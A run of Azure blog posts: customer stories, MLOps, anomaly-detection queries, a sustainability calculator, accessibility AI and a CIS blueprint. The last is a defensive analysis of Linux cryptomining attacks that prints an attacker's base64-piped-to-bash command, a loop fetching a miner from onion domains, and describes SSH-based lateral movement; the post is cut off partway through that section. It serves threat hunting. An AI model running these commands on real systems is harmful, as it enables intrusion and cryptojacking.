MSC Mediterranean Shipping Company on Azure Site Recovery

Today’s Q&A post covers an interview between Siddharth Deekshit, Program Manager, Microsoft Azure Site Recovery engineering, and Quentin Drion, IT Director of Infrastructure and Operations, MSC. MSC is a global shipping and logistics business, and our conversation focused on the organization’s journey with Azure Site Recovery (ASR). To learn more about achieving resilience in Azure, refer to this whitepaper.

I wanted to start by understanding the transformation journey that MSC is going through, including consolidating on Azure. Can you talk about how Azure is helping you run your business today?

We are a shipping line, so we move containers worldwide. Over the years, we have developed our own software to manage our core business. We have a different set of software for small, medium, and large entities, which were running on-premises. That meant we had to maintain a lot of on-premises resources to support all these business applications. A decision was taken a few years ago to consolidate all these business workloads inside Azure regardless of the size of the entity. When we are migrating, we turn off what we have on-premises and then start using software hosted in Azure and provide it as a service for our subsidiaries. This new design is managed in a centralized manner by an internal IT team.

That’s fantastic. Consolidation is a big benefit of using Azure. Apart from that, what other benefits do you see of moving to Azure?

For us, automation is a big one and a huge improvement. The API, integration, and automation capabilities we have with Azure allow us to deploy environments in a matter of hours, where before it took much, much longer because we had to order the hardware, set it up, and then configure it. Now we no longer need to worry about setup, hardware support, or warranties. The environment is all virtualized and we can, of course, provide the same level of recovery point objective (RPO), recovery time objective (RTO), and security to all the entities that we have worldwide.

Speaking of RTO and RPO, let’s talk a little bit about Site Recovery. Can you tell me what life was like before using Site Recovery?

Actually, when we started migrating workloads, we had a much more traditional approach, in the sense that we were doing primary production workloads in one Azure region, and we were setting up and managing a complete disaster recovery infrastructure in another region. So the traditional on-premises data center approach was really how we started with disaster recovery (DR) on Azure, but then we spent the time to study what Site Recovery could provide us. Based on the findings and some testing that we performed, we decided to change the implementation that we had in place for two to three years and switch to Site Recovery, ultimately to reduce our cost significantly, since we no longer have to keep our DR Azure Virtual Machines running in another region. In terms of management, it's also easier for us. For traditional workloads, we have better RPO and RTO than we saw with our previous approach. So we’ve seen great benefits across the board.

That’s great to know. What were you most skeptical about when it came to using Site Recovery? You mentioned that your team ran tests, so what convinced you that Site Recovery was the right choice?

It was really based on the tests that we did. Earlier, we were doing a lot of manual work to switch to the DR region, to ensure that domain name system (DNS) settings and other networking settings were appropriate, so there were a lot of constraints. When we tested it compared to this manual way of doing things, Site Recovery worked like magic. The fact that our primary region could fail and that didn’t require us to do a lot was amazing. Our applications could start again in the DR region and we just had to manage the upper layer of the app to ensure that it started correctly. We were cautious about this app restart, not because of the Virtual Machines (we were confident that Site Recovery would work) but because of our database engine. We were positively surprised to see how well Site Recovery works. All our teams were very happy about the solution, and they are seeing the added value of moving to this kind of technology for them as operational teams, but also for us in management to be able to save money, because we reduced the number of Virtual Machines that we had that were actually not being used.

Can you talk to me a little bit about your onboarding experience with Site Recovery?

I think we had six or seven major in-house developed applications in Azure at that time. We picked one of these applications as a candidate for testing. The test was successful. We then extended to a different set of applications that were in production. There were again no major issues. The only drawback we had was with some large disks. Initially, some of our larger disks were not supported. This was solved quickly, and since then it has been, I would say, really straightforward. Based on the success of our testing, we worked to switch all the applications we have on the platform to use Site Recovery for disaster recovery.

Can you give me a sense of what workloads you are running on your Azure Virtual Machines today? How many people leverage the applications running on those Virtual Machines for their day job?

So it's really core business apps. There is, of course, the main infrastructure underneath, but what we serve is business applications that we have written internally, presented through a Citrix frontend in Azure. These applications do container bookings, customer registrations, etc. I mean, we have different workloads associated with the complete process of shipping. In terms of users, we have some applications that are being used by more than 5,000 people, and more and more it’s becoming their primary day-to-day application.

Wow, that’s a ton of usage and I’m glad you trust Site Recovery for your DR needs. Can you tell me a little bit about the architecture of those workloads?

Most of them are Windows-based workloads. The software that gets used the most worldwide is a 3-tier application. We have a database on SQL, a middle-tier application server, and also some web frontend servers. But the new one that we have developed now is based on microservices. There are also some Linux servers being used for specific purposes.

Tell me more about your experience with Linux.

Site Recovery works like a charm with Linux workloads. We only made a few mistakes in the beginning, on our side. We wanted to use a product from Red Hat called Satellite for updates, but we did not realize that you cannot change the way the Virtual Machines are managed if you want to use Satellite. It needs to be defined at the beginning; otherwise it's too late. But besides this, the ‘bring your own license’ story works very well, especially with Site Recovery.

Glad to hear that you found it to be a seamless experience. Was there any other aspect of Site Recovery that impressed you, or that you think other organizations should know about?

For me, it's the capability to perform drills in an easy way. With the more traditional approach, each time you want to do a complete disaster recovery test, it's always time- and resource-consuming in terms of preparation. With Site Recovery, we did a test a few weeks back on the complete environment and it was really easy to prepare. It was fast to do the switch to the recovery region, and just as easy to bring the workload back to the primary region. So, I mean, for me today, it's really the ease of using Site Recovery.

If you had to do it all over again, what would you do differently on your Site Recovery journey?

I would start to use it earlier. If we hadn’t gone with the traditional active-passive approach, I think we could have saved time and money for the company. On the other hand, that approach gave us confidence in the journey. Other than that, I think we wouldn’t have changed much. But what we want to do now is start looking at Azure Site Recovery services to replicate workloads running on on-premises Virtual Machines in Hyper-V. For those applications that are still not migrated to Azure, we want to at least ensure proper disaster recovery. We also want to replicate some VMware Virtual Machines that we still have as part of our migration journey to Hyper-V. This is what we are looking at.

Do you have any advice for other prospective or current customers of Site Recovery?

One piece of advice that I could share is to start sooner and, if required, smaller. Start using Site Recovery even if it's on one small app. It will help you see the added value, and that will help you convince the operational teams that there is a lot of value and that they can trust the services Site Recovery provides instead of trying to do everything on their own.

That’s excellent advice. Those were all my questions, Quentin. Thanks for sharing your experiences.

Learn more about resilience with Azure. 
Quelle: Azure

MLOps—the path to building a competitive edge

Enterprises today are transforming their businesses using Machine Learning (ML) to develop a lasting competitive advantage. From healthcare to transportation, supply chain to risk management, machine learning is becoming pervasive across industries, disrupting markets and reshaping business models.

Organizations need the technology and tools required to build and deploy successful Machine Learning models and operate in an agile way. MLOps is the key to making machine learning projects successful at scale. What is MLOps? It is the practice of collaboration between data science and IT teams, designed to accelerate the entire machine learning lifecycle across model development, deployment, monitoring, and more. Microsoft Azure Machine Learning enables companies that fully embrace MLOps practices to truly realize the potential of AI in their business.

One great example of a customer transforming their business with Machine Learning and MLOps is TransLink. They support Metro Vancouver's transportation network, serving 400 million total boardings from residents and visitors as of 2018. With an extensive bus system spanning 1,800 square kilometers, TransLink customers depend heavily on accurate bus departure times to plan their journeys.

To enhance customer experience, TransLink deployed 18,000 different sets of Machine Learning models to better predict bus departure times, incorporating factors like traffic, bad weather, and other schedule disruptions. Using MLOps with Azure Machine Learning, they were able to manage and deliver the models at scale.

“With MLOps in Azure Machine Learning, TransLink has moved all models to production and improved predictions by 74 percent, so customers can better plan their journey on TransLink's network. This has resulted in a 50 percent reduction on average in customer wait times at stops.”–Sze-Wan Ng, Director of Analytics & Development, TransLink.

Johnson Controls is another customer using Machine Learning Operations at scale. For over 130 years, they have produced fire, HVAC and security equipment for buildings. Johnson Controls is now in the middle of a smart city revolution, with Machine Learning being a central aspect of their equipment maintenance approach.

Johnson Controls runs thousands of chillers with 70 different types of sensors each, streaming terabytes of data. MLOps helped put models into production in a timely fashion, with a repeatable process, to deliver real-time insights on maintenance routines. As a result, chiller shutdowns could be predicted days in advance and mitigated effectively, delivering cost savings and increasing customer satisfaction.

“Using the MLOps capabilities in Azure Machine Learning, we were able to decrease both mean time to repair and unplanned downtime by over 66 percent, resulting in substantial business gains.”–Vijaya Sekhar Chennupati, Applied Data Scientist at Johnson Controls

Getting started with MLOps

To take full advantage of MLOps, organizations need to apply the same rigor and processes as other software development projects.

To help organizations with their machine learning journey, GigaOm developed the MLOps vision report that includes best practices for effective implementation and a maturity model.

Maturity is measured through five levels of development across key categories such as strategy, architecture, modeling, processes, and governance. Using the maturity model, enterprises can understand where they are and determine what steps to take to ‘level up’ and achieve business objectives.

“Organizations can address the challenges of developing AI solutions by applying MLOps and implementing best practices. The report and MLOps maturity model from GigaOm can be a very valuable tool in this journey.”–Vijaya Sekhar Chennupati, Applied Data Scientist at Johnson Controls.

To learn more, read the GigaOm report and make machine learning transformation a reality for your business.

More information

Learn more about Azure Machine Learning

Read the GigaOm report, Delivering on the Vision of MLOps

Try Azure Machine Learning for free today.

Quelle: Azure

Azure Data Explorer and Stream Analytics for anomaly detection

Anomaly detection plays a vital role in many industries across the globe, such as fraud detection for the financial industry, health monitoring in hospitals, fault detection and operating environment monitoring in the manufacturing, oil and gas, utility, transportation, aviation, and automotive industries.

Anomaly detection is about finding patterns in data that do not conform to expected behavior. It is important for decision-makers to be able to detect anomalies and take proactive action if needed. Using the oil and gas industry as one example, deep-water rigs with various equipment are intensively monitored by hundreds of sensors that send measurements at various frequencies and in various formats. Analysis or visualization is hard using traditional software platforms, and any non-productive time on deep-water oil rig platforms caused by a failure to detect an anomaly could mean large financial losses each day.

Companies need new technologies like Azure IoT, Azure Stream Analytics, Azure Data Explorer, and machine learning to ingest, process, and transform data into strategic business intelligence to enhance exploration and production, improve manufacturing efficiency, and ensure safety and environmental protection. These managed services also help customers dramatically reduce software development time, accelerate time to market, provide cost-effectiveness, and achieve high availability and scalability.

While the Azure platform provides lots of options for anomaly detection and customers can choose the technology that best suits their needs, customers have also brought questions to field-facing architects about which use cases are most suitable for each solution. We’ll examine the answers to these questions below, but first, you’ll need to know a couple of definitions:

What is a time series? A time series is a series of data points indexed in time order. In the oil and gas industry, most equipment or sensor readings are sequences taken at successive points in time or depth.

What is decomposition of an additive time series? Decomposition is the task of separating a time series into its components, such as seasonal, trend, and residual.

Time-series forecasting and anomaly detection

Anomaly detection is the process of identifying observations that differ significantly from the majority of the data.

This is an anomaly detection example with Azure Data Explorer.

The red line is the original time series.
The blue line is the baseline (seasonal + trend) component.
The purple points are anomalous points on top of the original time series.
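
To make this concrete, a query of the following shape produces that kind of chart in Azure Data Explorer. This sketch uses the series_decompose_anomalies() function over demo_make_series2, a sample table in the Data Explorer help cluster; swap in your own table, timestamp, metric, and key columns.

// Build a 2-hour-resolution series per entity, then flag points that deviate
// from the decomposition baseline and render the anomaly chart.
let min_t = datetime(2017-01-05);
let max_t = datetime(2017-02-03 22:00);
demo_make_series2
| make-series num=avg(num) on TimeStamp from min_t to max_t step 2h by sid
| extend (anomalies, score, baseline) = series_decompose_anomalies(num, 1.5, -1, 'linefit')
| render anomalychart with (anomalycolumns=anomalies)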

To detect anomalies, either Azure Stream Analytics or Azure Data Explorer can be used for real-time analytics and detection.

Azure Stream Analytics is an easy-to-use, real-time analytics service that is designed for mission-critical workloads. You can build an end-to-end serverless streaming pipeline with just a few clicks, go from zero to production in minutes using SQL, or extend it with custom code and built-in machine learning capabilities for more advanced scenarios.

Azure Data Explorer is a fast, fully managed data analytics service for near real-time analysis on large volumes of data streaming from applications, websites, IoT devices, and more. You can ask questions and iteratively explore data on the fly to improve products, enhance customer experiences, monitor devices, boost operations, and quickly identify patterns, anomalies, and trends in your data.

Azure Stream Analytics or Azure Data Explorer?

Use Case

Stream Analytics is for continuous or streaming real-time analytics, with aggregate functions supporting hopping, sliding, tumbling, or session windows. It will not suit your use case if you want to write UDFs or UDAs in languages other than JavaScript or C#, or if your solution is in a multi-cloud or on-premises environment.

Data Explorer is for on-demand or interactive near real-time analytics, data exploration on large volumes of data streams, seasonality decomposition, ad hoc work, dashboards, and root cause analyses on data from near real-time to historical. It will not suit your use case if you need to deploy analytics onto the edge.

Forecasting

You can set up a Stream Analytics job that integrates with Azure Machine Learning Studio.

Data Explorer provides a native function for forecasting time series based on the same decomposition model. Forecasting is useful for many scenarios like preventive maintenance, resource planning, and more.
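
That native function is series_decompose_forecast(). As a hedged sketch, again on the help-cluster sample table, the query extends the series over the forecast horizon and asks for that many predicted points:

// Learn a baseline from a month of data and forecast the following week.
let min_t = datetime(2017-01-05);
let max_t = datetime(2017-02-03 22:00);
let dt = 2h;
let horizon = 7d;
demo_make_series2
| where sid == 'TS1'
| make-series num=avg(num) on TimeStamp from min_t to max_t+horizon step dt
| extend forecast = series_decompose_forecast(num, toint(horizon/dt))
| render timechart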

Seasonality

Stream Analytics does not provide seasonality support, given the limitation on sliding window size.

Data Explorer provides functions to automatically detect the periods in a time series, or to verify that a metric has the specific distinct period(s) you expect.
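
For example, series_periods_detect() scans a series for its dominant periods, and series_periods_validate() checks periods you already expect. A minimal sketch on the same sample data:

// Look for up to two dominant periods of up to 14 days in a 2-hour-binned series.
demo_make_series2
| where sid == 'TS1'
| make-series num=avg(num) on TimeStamp from datetime(2017-01-05) to datetime(2017-02-03 22:00) step 2h
| extend (periods, scores) = series_periods_detect(num, 0., 14d/2h, 2)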

Decomposition

Stream Analytics does not support decomposition.

Data Explorer provides a function that takes a set of time series and automatically decomposes each one into its seasonal, trend, residual, and baseline components.
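
That function is series_decompose(); a minimal sketch that splits one sample series into its components and charts them in separate panels:

// Decompose one series into baseline, seasonal, trend, and residual components.
demo_make_series2
| where sid == 'TS1'
| make-series num=avg(num) on TimeStamp from datetime(2017-01-05) to datetime(2017-02-03 22:00) step 2h
| extend (baseline, seasonal, trend, residual) = series_decompose(num, -1, 'linefit')
| render timechart with (ysplit=panels)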

Filtering and Analysis

Stream Analytics provides functions to detect spikes and dips or change points.

Data Explorer provides analysis to find anomalous points on a set of time series, and a root cause analysis (RCA) function that can be run after an anomaly is detected.

Filtering

Stream Analytics provides filtering with reference data, either slow-moving or static.

Data Explorer provides two generic functions:
•    Finite impulse response (FIR) which can be used for moving average, differentiation, shape matching
•    Infinite impulse response (IIR) for exponential smoothing and cumulative sum
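
To make the two filters concrete, here is a small self-contained sketch over an inline test series: a five-bin moving average through series_fir() and a cumulative sum through series_iir():

// A 5-bin centered moving average (FIR) and a running total (IIR) of a pulse.
print val = dynamic([0,0,0,0,0,0,0,0,10,20,40,100,40,20,10,0,0,0,0,0,0,0,0,0])
| extend moving_avg = series_fir(val, dynamic([1,1,1,1,1]), true, true)
| extend cum_sum = series_iir(val, dynamic([1]), dynamic([1,-1]))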

Anomaly Detection

Stream Analytics provides detections for:
•    Spikes and dips (temporary anomalies)
•    Change points (persistent anomalies such as level or trend change)

Data Explorer provides detections for:
•    Spikes & dips, based on enhanced seasonal decomposition model (supporting automatic seasonality detection, robustness to anomalies in the training data)
•    Changepoint (level shift, trend change) by segmented linear regression
•    KQL Inline Python/R plugins enable extensibility with other models implemented in Python or R

What's next?

Azure Data Analytics, in general, brings you best-of-breed technologies for each workload. The new Real-Time Analytics architecture allows you to leverage the best technology for each type of workload for stream and time-series analytics, including anomaly detection. The following is a list of resources that may help you get started quickly:

If you haven't already, check out this GitHub repository for Anomaly detection in Azure Stream Analytics

Check out this GitHub repository for Anomaly detection and forecasting in Azure Data Explorer, and Time series analysis in Azure Data Explorer.

Anomaly detection in Azure Stream Analytics Overview

Anomaly detection and forecasting in Azure Data Explorer Overview

Documentation on Time series analysis in Azure Data Explorer and this blog

Documentation on Kusto query language and Time Series Analysis 

Quelle: Azure

Microsoft Sustainability Calculator helps enterprises analyze the carbon emissions of their IT infrastructure

For more than a decade, Microsoft has been investing to reduce environmental impact while supporting the digital transformation of organizations around the world through cloud services. We strive to be transparent with our commitments, evidenced by our announcement that Microsoft’s cloud datacenters will be powered by 100 percent renewable energy sources by 2025. The commitments and investments we make as a company are important steps in reducing our own environmental impact, but we recognize that the opportunity for positive change is greatest by empowering customers and partners to achieve their own sustainability goals.

An industry first—the Microsoft Sustainability Calculator

Today we’re announcing the availability of the Microsoft Sustainability Calculator, a Power BI application for Azure enterprise customers that provides new insight into the carbon emissions data associated with their Azure services. Migrating from traditional datacenters to cloud services significantly improves efficiency; however, enterprises are now looking for additional insight into the carbon impact of their cloud workloads to help them make more sustainable computing decisions. For the first time, those responsible for reporting on and driving sustainability within their organizations will have the ability to quantify the carbon impact of each Azure subscription over a period of time and datacenter region, as well as see estimated carbon savings from running those workloads in Azure versus on-premises datacenters. This data is crucial for reporting existing emissions and is the first step in establishing a foundation to drive further decarbonization efforts.

Providing transparency with rigorous methodology

The tool’s calculations are based on a customer’s Azure consumption, informed by the research in the 2018 whitepaper, “The Carbon Benefits of Cloud Computing: a Study of the Microsoft Cloud”, and have been independently verified by Apex, a leading environmental verification body. The calculator factors in inputs such as the energy requirements of the Azure service, the energy mix of the electric grid serving the hosting datacenters, Microsoft’s procurement of renewable energy in those datacenters, as well as the emissions associated with the transfer of data over the internet. The result is an estimate of the greenhouse gas (GHG) emissions, measured in total metric tons of carbon dioxide equivalent (MTCO2e), related to a customer’s consumption of Azure.

The calculator gives a granular view of the estimated emissions savings from running workloads on Azure by accounting for Microsoft’s IT operational efficiency, IT equipment efficiency, and datacenter infrastructure efficiency compared to that of a typical on-premises deployment. It also estimates the emissions savings attributable to a customer from Microsoft’s purchase of renewable energy.

We also understand customers want transparency into the specific commitments we are making to build a more sustainable cloud. To make that information easily accessible, we’ve built a view within the tool of the renewable energy projects that Microsoft has invested in as part of its carbon neutral and renewable energy commitments. Each year Microsoft purchases renewable energy to cover its annual cloud consumption. Customers can use the world map to learn about projects in regions where they consume Azure services or have a regional presence. The projects are examples of the investments that Microsoft has made since 2012.

A path to actionable insight

Azure enterprise customers can get started by downloading the Microsoft Sustainability Calculator from AppSource now and following the included setup instructions. We’re excited by the opportunity this new tool provides for our customers to gain a deeper understanding of their current infrastructure and drive meaningful sustainability conversations within their organizations. We see this as a first step and plan to deepen and expand the tool’s capabilities in the future. We know our customers would like an even more comprehensive view of the sustainability benefits of our cloud services and look forward to supporting and enabling them in their journey.
Quelle: Azure

Creating a more accessible world with Azure AI

At Microsoft, we are inspired by how artificial intelligence is transforming organizations of all sizes, empowering them to reimagine what’s possible. AI has immense potential to unlock solutions to some of society’s most pressing challenges.

One challenge is that, according to the World Health Organization, globally only 1 in 10 people with a disability has access to assistive technologies and products. We believe that AI solutions can have a profound impact on this community. To meet this need, we aim to democratize AI to make it easier for every developer to build accessibility into their apps and services, across language, speech, and vision.

In view of the upcoming Bett Show in London, we’re shining a light on how Immersive Reader enhances reading comprehension for people regardless of their age or ability, and we’re excited to share how Azure AI is broadly enabling developers to build accessible applications that empower everyone.

Empowering readers of all abilities

Immersive Reader is an Azure Cognitive Service that helps users of any age and reading ability with features like reading aloud, translating languages, and focusing attention through highlighting and other design elements. Millions of educators and students already use Immersive Reader to overcome reading and language barriers.

The Young Women’s Leadership School of Astoria, New York, brings together an incredible diversity of students with different backgrounds and learning styles. The teachers at The Young Women’s Leadership School support many types of learners, including students who struggle with text comprehension due to learning differences, or language learners who may not understand the primary language of the classroom. The school wanted to empower all students, regardless of their background or learning styles, to grow their confidence and love for reading and writing.

Watch the story here. 

Teachers at The Young Women’s Leadership School turned to Immersive Reader and an Azure AI partner, Buncee, as they looked for ways to create a more inclusive and engaging classroom. Buncee enables students and teachers to create and share interactive multimedia projects. With the integration of Immersive Reader, students who are dyslexic can benefit from features that help focus attention in their Buncee presentations, while those who are just learning the English language can have content translated to them in their native language.

Like Buncee, companies including Canvas, Wakelet, ThingLink, and Nearpod are also making content more accessible with Immersive Reader integration. To see the entire list of partners, visit our Immersive Reader Partners page. Discover how you can start embedding Immersive Reader into your apps today. To learn more about how Immersive Reader and other accessibility tools are fostering inclusive classrooms, visit our EDU blog.

Breaking communication barriers

Azure AI is also making conversations, lectures, and meetings more accessible to people who are deaf or hard of hearing. By enabling conversations to be transcribed and translated in real-time, individuals can follow and fully engage with presentations.

The Balavidyalaya School in Chennai, Tamil Nadu, India, teaches speech and language skills to young children who are deaf or hard of hearing. The school recently held an international conference with hundreds of alumni, students, faculty, and parents. With live captioning and translation powered by Azure AI, attendees were able to follow conversations in their native languages, while the presentations were given in English.

Learn how you can easily integrate multi-language support into your own apps with Speech Translation, and see the technology in action with Translator, with support for more than 60 languages, today.

Engaging learners in new ways

We recently announced the Custom Neural Voice capability of Text to Speech, which enables customers to build a unique voice, starting from just a few minutes of training audio.

The Beijing Hongdandan Visually Impaired Service Center leads the way in applying this technology to empower users in incredible ways. Hongdandan produces educational audiobooks featuring the voice of Lina, China’s first blind broadcaster, using Custom Neural Voice. While creating audiobooks can be a time-consuming process, Custom Neural Voice allows Lina to produce high-quality audiobooks at scale, enabling Hongdandan to support over 105 schools for the blind in China like never before.

“We were amazed by how quickly Azure AI could reproduce Lina's voice in such a natural-sounding way with her speech data, enabling us to create educational audiobooks much more quickly. We were also highly impressed by Microsoft's commitment to protecting Lina's voice and identity."—Xin Zeng, Executive Director at Hongdandan

Learn how you can give your apps a new voice with Text to Speech.

Making the world visible for everyone

According to the International Agency for the Prevention of Blindness, more than 250 million people are blind or have low vision across the globe. Last month, in celebration of the United Nations International Day of Persons with Disabilities, Seeing AI, a free iOS app that describes nearby people, text, and objects, expanded support to five new languages. The additional language support for Spanish, Japanese, German, French, and Dutch makes it possible for millions of blind or low vision individuals to read documents, engage with people around them, hear descriptions of their surroundings in their native language, and much more. All of this is made possible with Azure AI.

Try Seeing AI today or extend vision capabilities to your own apps using Computer Vision and Custom Vision.

Get involved

We are humbled and inspired by what individuals and organizations are accomplishing today with Azure AI technologies. We can’t wait to see how you will continue to build on these technologies to unlock new possibilities and design more accessible experiences. Get started today with a free trial.

Check out our AI for Accessibility program to learn more about how companies are harnessing the power of AI to amplify capabilities for the millions of people around the world with a disability.
Quelle: Azure

New Azure blueprint for CIS Benchmark

We’ve released our newest Azure blueprint that maps to another key industry standard, the Center for Internet Security (CIS) Microsoft Azure Foundations Benchmark. This follows the recent announcement of our Azure blueprint for FedRAMP moderate and adds to the growing list of Azure blueprints for regulatory compliance, which now includes ISO 27001, NIST SP 800-53, PCI-DSS, UK OFFICIAL, UK NHS, and IRS 1075.

Azure Blueprints is a free service that enables cloud architects and central information technology groups to define a set of Azure resources that implements and adheres to an organization's standards, patterns, and requirements. Azure Blueprints makes it possible for development teams to rapidly build and stand up new trusted environments within organizational compliance requirements. Customers can apply the new CIS Microsoft Azure Foundations Benchmark blueprint to new subscriptions as well as existing environments.

CIS benchmarks are configuration baselines and best practices for securely configuring a system, developed by CIS, a nonprofit entity whose mission is to “identify, develop, validate, promote, and sustain best practice solutions for cyber defense.” A global community collaborates in a consensus-based process to develop these internationally recognized security standards for defending IT systems and data against cyberattacks. Used by thousands of businesses, they offer prescriptive guidance for establishing a secure baseline system configuration. System and application administrators, security specialists, and others who develop solutions using Microsoft products and services can use these best practices to assess and improve the security of their applications.

Each of the CIS Microsoft Azure Foundations Benchmark recommendations is mapped to one or more of the 20 CIS Controls, which were developed to help organizations improve their cyber defense. The blueprint assigns Azure Policy definitions to help customers assess their compliance with the recommendations. Major elements of all nine sections of the recommendations from the CIS Microsoft Azure Foundations Benchmark v1.1.0 include:

Identity and Access Management (1.0)

Assigns Azure Policy definitions that help you monitor when multi-factor authentication isn't enabled on privileged Azure Active Directory accounts.
Assigns an Azure Policy definition that helps you monitor when multi-factor authentication isn't enabled on non-privileged Azure Active Directory accounts.
Assigns Azure Policy definitions that help you monitor for guest accounts and custom subscription roles that may need to be removed.

Security Center (2.0)

Assigns Azure Policy definitions that help you monitor networks and virtual machines where the Security Center standard tier isn't enabled.
Assigns Azure Policy definitions that help you ensure that virtual machines are monitored for vulnerabilities and remediated, endpoint protection is enabled, and system updates are installed on virtual machines.
Assigns an Azure Policy definition that helps you ensure virtual machine disks are encrypted.

Storage Accounts (3.0)

Assigns an Azure Policy definition that helps you monitor storage accounts that allow insecure connections.
Assigns an Azure Policy definition that helps you monitor storage accounts that allow unrestricted access.
Assigns an Azure Policy definition that helps you monitor storage accounts that don't allow access from trusted Microsoft services.

Database Services (4.0)

Assigns an Azure Policy definition that helps ensure SQL Server auditing is enabled as well as properly configured, and logs are retained for at least 90 days.
Assigns an Azure Policy definition that helps you ensure advanced data security notifications are properly enabled.
Assigns an Azure Policy definition that helps you ensure that SQL Servers are configured for encryption and other security settings.

Logging and Monitoring (5.0)

Assigns Azure Policy definitions that help you ensure a log profile exists and is properly configured for all Azure subscriptions, and activity logs are retained for at least one year.

Networking (6.0)

Assigns an Azure Policy definition that helps you ensure Network Watcher is enabled for all regions where resources are deployed.

Virtual Machines (7.0)

Assigns an Azure Policy definition that helps you ensure disk encryption is enabled on virtual machines.
Assigns an Azure Policy definition that helps you ensure that only approved virtual machine extensions are installed.
Assigns Azure Policy definitions that help you ensure that system updates are installed, and endpoint protection is enabled on virtual machines.

Other Security Considerations (8.0)

Assigns an Azure Policy definition that helps you ensure that key vault objects are recoverable in the case of accidental deletion.
Assigns an Azure Policy definition that helps you ensure role-based access control is used to manage permissions in Kubernetes service clusters.

AppService (9.0)

Assigns an Azure Policy definition that helps you ensure web applications are accessible only over secure connections.
Assigns Azure Policy definitions that help you ensure web applications are only accessible using HTTPS, use the latest version of TLS encryption, and are only reachable by clients with valid certificates.
Assigns Azure Policy definitions to ensure that .NET Framework, PHP, Python, Java, and HTTP versions are the latest.

Azure customers seeking to implement compliance with CIS Benchmarks should note that although this Azure blueprint may help customers assess compliance with particular configuration recommendations, it does not ensure full compliance with all requirements of the CIS Benchmark and CIS Controls. In addition, recommendations are associated with one or more Azure Policy definitions, and the compliance standard includes recommendations that aren't addressed by any Azure Policy definitions in blueprints at this time. Therefore, compliance in Azure Policy will only consist of a partial view of your overall compliance status. Customers are ultimately responsible for meeting the compliance requirements applicable to their environments and must determine for themselves whether particular information helps meet their compliance needs.
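
To keep an eye on that partial view, policy states can be queried with Azure Resource Graph, which accepts a subset of the Kusto query language. The following is a hedged sketch, assuming the policyresources table exposes your assignments' policy states; verify the schema in your own tenant before relying on it.

// Count non-compliant resources per policy definition across your subscriptions.
policyresources
| where type == "microsoft.policyinsights/policystates"
| where tostring(properties.complianceState) == "NonCompliant"
| summarize nonCompliant = count() by policy = tostring(properties.policyDefinitionName)
| order by nonCompliant desc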

Learn more about the CIS Microsoft Azure Foundations Benchmark blueprint in our documentation.
Quelle: Azure

Learning from cryptocurrency mining attack scripts on Linux

Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. In the past, we've talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we're talking about an attack that a few of our customers have seen, where a service is exploited to run the attacker's code directly on the machine hosting the service.

This attack is interesting for several reasons. The attacker echoes their scripts in, so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit, so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the Linux MITRE ATT&CK Matrix and use those to talk about hunting on your own data.

Initial vector

For this attack, the first indication something is wrong in the audit logs is an echo command piping a base64 encoded command into base64 for decoding, then piping into bash. Across our users, this first command has a parent process of an application or service exposed to the internet, and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like ubuntu, jenkins, and hadoop being used.

/bin/sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K<snip>CmRvbmUK|base64 -d|bash"
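If you capture one of these command lines, you can safely inspect the payload by decoding it without the trailing pipe into bash. As a minimal example, decoding the common opening of this attacker's scripts (discussed in the Scripts section below) reveals the plaintext commands:

# Decode for inspection only; note there is no "|bash" at the end
echo 'ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K' | base64 -d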

Scripts

It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64 encoded scripts. One of the interesting things about those scripts is they start with the same first two lines: redirecting both the standard error and standard output stream to /dev/null and setting the path variable to locations the attacker knows generally hold the system commands they want to run. 

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

This means that when each of these scripts is base64 encoded, the first part of the encoded blob is identical every time.

ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K
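This shared prefix is something you can compute yourself and use as a hunting indicator. A minimal sketch, assuming GNU coreutils:

# Recreate the two-line prologue and compute its base64 encoding;
# any script that starts the same way produces the same encoded prefix,
# which you can then search for in your command-line logs
printf 'exec &>/dev/null\nexport PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin\n' | base64 -w0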

The reuse of the same opening lines is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can, to see how they try to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible download domains, checking on each pass whether the process whose ID they stashed in /tmp/.X11-unix/01 (presumably their miner) is already running, and stopping once it is. This type of insight gives defenders more data to pivot on during an investigation.

for h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to
do
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then
x t<snip>v.$h
else
break
fi
done

We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&CK Matrix for Linux.

Lateral Movement

While it isn’t the first thing the attacker does, they do use an interesting combination of Discovery (T1018: Remote System Discovery) and Lateral Movement (T1021: Remote Services) techniques to infect other hosts. They grep through .bash_history, /etc/hosts, and .ssh/known_hosts looking for IP addresses. They then attempt to pass their initial encoded script to each host using both the root account and the account they compromised on the current host. The ssh options show they rely on existing keys rather than passwords (-oPasswordAuthentication=no, -oPubkeyAuthentication=yes). Note that in the original script the xssh function appears before the call.

